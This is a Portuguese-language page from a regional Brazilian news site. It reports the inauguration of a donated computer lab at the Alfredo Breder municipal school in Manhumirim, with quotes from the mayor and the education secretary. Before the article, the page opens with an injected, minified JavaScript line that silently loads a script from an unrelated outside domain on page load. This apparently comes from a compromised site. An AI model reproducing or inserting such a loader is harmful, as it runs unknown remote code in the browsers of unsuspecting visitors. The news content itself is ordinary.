;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Escola Alfredo Breder ganha laboratório de informática - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Escola Alfredo Breder ganha laboratório de informática

A Prefeitura de Manhumirim inaugurou no dia 16/12 um laboratório de informática na escola municipal Alfredo Breder. Os 10 computadores, uma TV e um DVD foram doados pela empresa Olam/Outspan em parceria com o Conselho de Exportadores de Café do Brasil-Cecafé, através do projeto “Criança do Café na Escola”.

Estiveram presentes no evento o Prefeito de Manhumirim, Ronaldo Lopes, a Secretária Municipal de Educação, Marilene da Silva Leite Cardoso, Vereadores, além de diretores da empresa Outspan e representantes do Cecafé.

A Secretária Municipal de Educação lembrou na sua fala que boa parte dos alunos da escola é formada por filhos de agricultores ou pais que atuam na colheita do café. “Esse projeto que hoje beneficia estas crianças existe graças ao trabalho dos pais deles. É uma troca. Os nossos alunos a partir de hoje poderão aprender uma nova linguagem: a digital”, disse Marilene.

O Prefeito, Ronaldo Lopes, agradeceu a parceria com a Outspan e destacou a importância da valorização da vida através das oportunidades. “É uma satisfação ser parceiro de projetos que beneficiam crianças e que proporcionam a elas novos conhecimentos, afirmou.

O laboratório de informática tem acesso à internet e poderá ser utilizada também por pais e pela comunidade local.

Leila Furtado / Assessoria de Comunicação / Prefeitura de Manhumirim

Ofertas

[secvitrine/pendrive/17873]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.